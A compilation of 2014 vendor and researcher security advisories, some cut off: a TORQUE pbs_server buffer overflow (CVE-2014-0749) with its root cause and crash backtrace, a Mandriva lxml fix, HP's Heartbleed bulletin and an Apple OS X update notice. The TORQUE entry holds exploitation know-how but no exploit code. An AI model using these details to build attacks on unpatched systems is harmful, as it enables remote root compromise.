[CVE-2014-0749] TORQUE Buffer Overflow
A buffer overflow exists in versions of TORQUE which can be exploited in order to remotely execute code from an unauthenticated perspective. This issue is exploitable in all versions of the 2.5 branch, upto and including 2.5.13 Software: TORQUE Affected Versions: All 2.5 releases up to and including 2.5.13 CVE Reference: CVE-2014-0749 Authors: John Fitzpatrick (MWR Labs) Severity: High Risk Vendor: Adaptive Computing Vendor Response: Incorporated MWR supplied fix into 2.5 development branch, no advisory [Description] A buffer overflow exists in older versions of TORQUE which can be exploited in order to remotely execute code from an unauthenticated perspective. This issue is exploitable in all versions of the 2.5 branch, up to and including 2.5.13. [Impact] Successful exploitation allows remote execution of code as root. [Cause] This issue exists as a result of a misplaced bounds check. [Solution] Despite still being widely used Torque 2.5.x is now end of life and no longer supported by Adaptive. The latest version of the 2.5 branch (2.5.13) is vulnerable to this issue. MWR have submitted a fix to the 2.5-dev GitHub repository (which is still active) which resolves this issue. It is strongly recommended that a version of 2.5-dev (later than pull request #171) is updated to. Code changes in the 4.2.x branch significantly enhance the security posture of TORQUE and so MWR would recommend updating to this branch if possible. [Technical Details] TORQUE is a widely used resource manager. There are several branches 2.x, 3.x and 4.×. The code is open source, but maintained by Adaptive Computing. Operations such as job submissions and querying of job queues within TORQUE are handled by the pbs_server component. It was found that the pbs_server did not perform sufficient bounds checking on messages sent to it. As a result it was found to be possible to submit messages which resulted in an overflow leading to arbitrary code execution. This could be achieved from a remote, unauthenticated perspective regardless of whether the source IP address is permitted to submit jobs or not. The vulnerability exists because the file disrsi_.c fails to ensure that the length of count (which is read from the request packet) is less than dis_umaxd prior to being used in a later memcpy(). As a result a specially crafted request can smuggle through a count value which is later decremented and becomes the ct value in a memcpy() made from within tcp_gets(): memcpy((char *)str, tp-tdis_leadp, ct); This failure to validate count allows control over the size of the memcpy() to be leveraged and as a result control over the amount of data read from the remainder of the packet. If this value is large the memcpy() will overwrite the stack and so can be leveraged in order to gain control over the execution of the program. A backtrace showing the flow of execution is shown below: #0 0x003dd4a88b9a in memcpy () from /lib64/libc.so.6 #1 0x7fa0008cb65b in tcp_gets (fd=11, str=0x7fff8dfce741 '3' repeats 26 times, Ab1Ab2Ab3, ct=332) at ../Libifl/tcp_dis.c:567 #2 0x7fa0008be994 in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938, count=333) at ../Libdis/disrsi_.c:187 #3 0x7fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938, count=value optimized out) at ../Libdis/disrsi_.c:216 #4 0x7fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938, count=value optimized out) at ../Libdis/disrsi_.c:216 #5 0x7fa0008bdfab in disrfst (stream=11, achars=33, value=0x27f0b58 ) at ../Libdis/disrfst.c:125 #6 0x7fa0008c13ba in decode_DIS_ReqHdr (sock=11, preq=0x27f0b20, proto_type=0x7fff8dfce9dc, proto_ver=0x7fff8dfce9d8) at ../Libifl/dec_ReqHdr.c:141 #7 0x00409ba1 in dis_request_read (sfds=11, request=0x27f0b20) at dis_read.c:137 #8 0x0041cb6e in process_request (sfds=11) at process_request.c:355 #9 0x7fa0008d4899 in wait_request (waittime=value optimized out, SState=0x72c258) at ../Libnet/net_server.c:508 #10 0x0041afeb in main_loop () at pbsd_main.c:1203 #11 0x0041bd15 in main (argc=value optimized out, argv=value optimized out) at pbsd_main.c:1760 TORQUE is required to run as root and so successful exploitation leads to code execution as root. MWR have created a proof of concept exploit for TORQUE running on 64bit versions of CentOS which makes use of return oriented programming and ROP gadgets in order to execute arbitrary code as root. This vulnerability can be exploited reliably and remotely. It is possible to reach this path of execution from a remote and unauthenticated perspective (and regardless of whether the attackers system is in the acl_hosts list or not). It is expected that code execution within a 32bit environment is simpler to achieve. Whilst the necessary bounds check was found to be missing from all versions of TORQUE reviewed this issue was only found to be
[ MDVSA-2014:088 ] python-lxml
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:088 http://www.mandriva.com/en/support/security/ ___ Package : python-lxml Date: May 15, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Updated python-lxml packages fix security vulnerability: The clean_html() function, provided by the lxml.html.clean module, did not properly clean HTML input if it included non-printed characters (\x01-\x08). A remote attacker could use this flaw to serve malicious content to an application using the clean_html() function to process HTML, possibly allowing the attacker to inject malicious code into a website generated by this application (CVE-2014-3146). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3146 http://advisories.mageia.org/MGASA-2014-0218.html ___ Updated Packages: Mandriva Enterprise Server 5: 35048c25adfe1871d3f4967407785225 mes5/i586/python-lxml-2.1.1-1.1mdvmes5.2.i586.rpm 2693d5ca44dd8804fa8d5f74b855accd mes5/SRPMS/python-lxml-2.1.1-1.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 7106b307c87f78a0ccbdcd782b1f2bd3 mes5/x86_64/python-lxml-2.1.1-1.1mdvmes5.2.x86_64.rpm 2693d5ca44dd8804fa8d5f74b855accd mes5/SRPMS/python-lxml-2.1.1-1.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 30f3bf2c3b6db68cb633e2e87a13cb9b mbs1/x86_64/python-lxml-2.3.3-3.1.mbs1.x86_64.rpm 8631bd626091dfba02951f2244e62c34 mbs1/SRPMS/python-lxml-2.3.3-3.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTdHnVmqjQ0CJFipgRAnAYAKCxJnHrRhCGejzqx+2IbjwcjXeFOgCfQt40 qAPjJU3CYmDUxNIiGMlHFRY= =UKQ4 -END PGP SIGNATURE-
[security bulletin] HPSBMU02995 rev.7 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04236102 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236102 Version: 7 HPSBMU02995 rev.7 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-11 Last Updated: 2014-05-14 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY The Heartbleed vulnerability was detected in specific OpenSSL versions. OpenSSL is a 3rd party product that is embedded with some of HP Software products. This bulletin objective is to notify HP Software customers about products affected by the Heartbleed vulnerability. Note: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found in the OpenSSL product cryptographic software library product. This weakness potentially allows disclosure of information protected, under normal conditions, by the SSL/TLS protocol. The impacted products appear in the list below are vulnerable due to embedding OpenSSL standard release software. References: CVE-2014-0160 (SSRT101499) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Product Impacted HP Product Versions Notes HP Service Manager v9.32, v9.33 Security bulletin HPSBGN03008: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04248997 HP Asset Manager v9.40, v9.40 CSC Security Bulletin HPSBMU03018: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04260505 HP UCMDB Browser v1.x, v2.x, v3.x Security bulletin HPSBMU03019: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04260353 note: APR enabled on Tomcat includes an affected OpenSSL version HP UCMDB Configuration Manager v9.1x, v9.2x, v9.3x, v10.01, v10.10 Security bulletin HPSBMU03019: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04260353 HP CIT (ConnectIT) v9.52, v9.53 Security bulletin HPSBMU03017: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04260456 HP Executive Scorecard v9.40, v9.41 HP Server Automation v10.00, v10.01 Security bulletin HPSBGN03010: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04250814 HP Diagnostics v9.23, v9.23 IP1 Security bulletin HPSBMU03025 : https://h20564.www2.hp.com/portal/site/hpsc/ public/kb/docDisplay?docId=emr_na-c04267775 HP Business Process Monitor v.9.23, v.9.24 HP LoadRunner v11.52, v12.0 Security bulletin HPSBMU03040: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay?docId=emr_na-c04286049 HP Performance Center v11.52, v12.0 Security bulletin HPSBMU03040: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay?docId=emr_na-c04286049 HP Autonomy WorkSite Server v9.0 SP1 (on-premises software) Security bulletin HPSBMU02999: https://h20564.www2.hp.com/portal/site/hpsc/p ublic/kb/docDisplay/?docId=emr_na-c04239374 Impacted Versions table BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP Software is working to address this vulnerability for all affected product versions. HP Software will release product specific security bulletins for each impacted product. Each bulletin will include a patch and/or mitigation guideline. HP will update this bulletin with references to security bulletins for each product in the impacted versions table. Note: OpenSSL is an external product embedded in HP products. Bulletin Applicability: This bulletin applies to each OpenSSL component that is embedded within the HP products listed in the security bulletin. The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide. To learn more about HP Software Incident Response, please visit http://www8.h p.com/us/en/software-solutions/enterprise-software-security-center/response-c enter.html . Software updates are available from HP Software Support Online at http://support.openview.hp.com/downloads.jsp HISTORY Version:1 (rev.1) - 11 April 2014 Initial release Version:2 (rev.2) - 13 April 2014 Added HP
APPLE-SA-2014-05-15-1 OS X Mavericks v10.9.3
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 APPLE-SA-2014-05-15-1 OS X Mavericks v10.9.3 OS X Mavericks v10.9.3 is now available and includes the content of Security Update 2014-002. For further details see About Security Update 2014-002 at http://support.apple.com/kb/HT6207 OS X Mavericks v10.9.3 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJTdP7fAAoJEBcWfLTuOo7t3YoP/2tTVtuv/apIsYG5Ou+8Gkzh SaWDYkxSevNu07I8VYrmubsyrFwoBk7mGI2xvbT2LwN+Qbg56VVz21iaFoR9w+mL PEk4wf60hvx7qS4wOjj+ZwzQvfSIoDFTc4eh/TMnyWr6wn9vM2FNZPWXTPXZpLpi RIKO08RbAnRq7Pa8EDarvFBIo0L9udKm0NbCTIoPyT2G/kQWBna3bWuX6wPIZ2eZ rgg7+bKmv9Va18yhsdfX31H3KMXel8s3TUck+90OEif70vR0Zz4VPm1ikoqd4J4k /hnlqTmKOQISEbnzhmpzAcO2uS1nZhLld3UQcJoSaqdMzcHfGrrdByFRaZ8MB3PZ tBRgh+Hhl7R8H64yxSFdMJbvbsYZgplMpKEZaWmRzl3Dnkd52JLKeF8A0yfBkAtE upe3Sjascywmfz786g/42NLJOeOcMDci84RKt1UEFisHeGxiH6rh12GzSFJwe8MD iT3Q/3NFqF00+IK39DjSVl2m4y9hEoHcizS+/wDuZwwjYpvb0Y57/UuJ1f/LHJWu PXn+0BJEL8i6It35NDUesBpavzWcx0QlN2sOvfuyPgEme8di2xJROn4QdvYQ+XT1 I2vYxsZZy/8dEOLXyvhsR5dC+EZdad75ug05MGWXcClvDXzX+ZvIlMYkis/Upgab fmhlGoJmElSQiKL95sEk =Diky -END PGP SIGNATURE- signature.asc Description: Message signed with OpenPGP using GPGMail
